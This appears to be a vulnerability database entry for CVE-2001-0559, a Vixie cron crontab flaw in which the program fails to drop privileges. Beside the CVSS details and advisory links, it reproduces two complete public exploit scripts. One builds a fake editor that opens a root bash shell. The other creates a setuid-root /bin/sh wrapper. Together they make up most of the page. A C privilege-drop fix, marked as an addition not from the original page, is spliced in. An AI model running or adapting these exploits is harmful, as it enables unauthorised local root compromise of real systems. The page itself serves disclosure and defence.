CVE-2001-0559
CVSS 7.2
Published: 2001-08-14 00:00:00
Revised: 2008-09-10 15:08:24

[Original] crontab in Vixie cron 3.0.1 and earlier does not properly drop privileges after the failed parsing of a modification operation, which could allow a local attacker to gain additional privileges when an editor is called to correct the error.


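[CNNVD] Vixie cron privilege escalation vulnerability (CNNVD-200108-066)

        crontab in Vixie cron 3.0.1 and earlier does not properly drop privileges after a modification operation fails to parse; a local attacker can gain additional privileges when the editor is invoked to correct the error.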

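- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]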

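- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found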

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0559
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0559
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-066
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2687
(VENDOR_ADVISORY)  BID  2687
http://www.securityfocus.com/archive/1/183029
(VENDOR_ADVISORY)  BUGTRAQ  20010507 Vixie cron vulnerability
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-050.php3
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2001:050
http://www.debian.org/security/2001/dsa-054
(VENDOR_ADVISORY)  DEBIAN  DSA-054
http://xforce.iss.net/static/6508.php
(UNKNOWN)  XF  vixie-cron-gain-privileges(6508)
http://www.novell.com/linux/security/advisories/2001_017_cron_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:17

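- Vulnerability information

Vixie cron privilege escalation vulnerability
High risk Unknown
2001-08-14 00:00:00 2005-05-02 00:00:00
Local
        crontab in Vixie cron 3.0.1 and earlier does not properly drop privileges after a modification operation fails to parse; a local attacker can gain additional privileges when the editor is invoked to correct the error.

- Advisories and patches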

        

- Vulnerability information (20822)

Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (1) (EDBID:20822)
linux local
2001-05-07 Verified
0 Sebastian Krahmer
source: http://www.securityfocus.com/bid/2687/info

Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.

When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.

This vulnerability may be exploited to gain root privileges locally. 

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is>                   |"
echo "| Michal Zalewski <lcamtuf@coredump.cx>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else {
    dup2(1,0);
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n");
    system("touch $HOME/.xploited");
    system("bash");
  }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi


		

- Vulnerability information (20823)

Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (2) (EDBID:20823)
linux local
2001-07-05 Verified
0 cairnsc
source: http://www.securityfocus.com/bid/2687/info
 
Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.
 
When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.
 
This vulnerability may be exploited to gain root privileges locally. 

#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
#   the crontab file maintenance program (crontab) fails to drop privileges
#   before invoking the editor under certain circumstances.
#
# description:
#   a serialization error exists in some versions of the file maintenance
#   program, crontab.  the vulnerability was introduced in versions which
#   were patched for separate vulnerability in fall of 2000 (see Bugtraq
#   ID #1960).
#
#   when a parsing error occurs after a modification operation, crontab will
#   fail to drop privileges correctly for subsequent modification operations.
#   because the program is installed setuid root, it may be possible for a
#   local user to gain root privileges.
#
# affected versions:
#   cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
#   note that copies of the program with the patch mentioned above are likely
#   to also be vulnerable.
#
# references:
#   http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com

CRONTAB=/usr/bin/crontab

if ! test -x $CRONTAB; then
  echo "** unable to locate crontab executable, exiting"
  exit 1
fi

cat > vcsh.c << EOF
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", NULL);
}
EOF

echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c

if ! test -x $PWD/vcsh; then
  echo "** compilation failed, exiting"
  exit 1
fi

echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh

sleep 1 && echo "foo" >> \$1

if test -f $PWD/vcboom; then
  chown root.root $PWD/vcsh
  chmod 4755 $PWD/vcsh
  rm $PWD/vcboom
else
  touch $PWD/vcboom
fi
EOF

chmod 0755 $PWD/vcex.sh

echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo

(EDITOR=$PWD/vcex.sh $CRONTAB -e)

echo
echo "** done, the shell wrapper should be suid root"
exit 0		
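
The fix pattern for the flaw described in both entries above, as an added C example that is not from the original page or from Vixie cron's source: the editor is started through one helper that permanently drops privileges in the child on every call, so a re-edit after a parse error cannot skip the drop. `drop_privileges` and `run_editor` are hypothetical names, and `true` stands in for the editor.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* for setgroups() on glibc */
#endif
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently switch to uid/gid and prove that root cannot be regained. */
static int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && uid != 0 && setgroups(1, &gid) != 0)
        return -1;                      /* clear supplementary groups as root */
    if (setgid(gid) != 0 || setuid(uid) != 0)   /* group first, then user */
        return -1;
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    if (uid != 0 && setuid(0) == 0)     /* a saved uid of 0 was still usable */
        return -1;
    return 0;
}

/* Hypothetical helper: run `editor path` as uid/gid. The drop happens in the
 * child on every call, so a second edit is treated exactly like the first. */
int run_editor(const char *editor, const char *path, uid_t uid, gid_t gid)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges(uid, gid) != 0)
            _exit(126);                 /* refuse to start the editor at all */
        execlp(editor, editor, path, (char *)NULL);
        _exit(127);                     /* editor could not be executed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    for (int pass = 1; pass <= 2; pass++)  /* edit, parse error, edit again */
        printf("pass %d: exit %d\n", pass, run_editor("true", "/dev/null", getuid(), getgid()));
    return 0;
}
```

An exit status of 126 means the privilege drop could not be completed or verified and the editor was never started.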

- Vulnerability information

1813
Vixie Cron crontab Privilege Lowering Handling Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2001-05-07 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete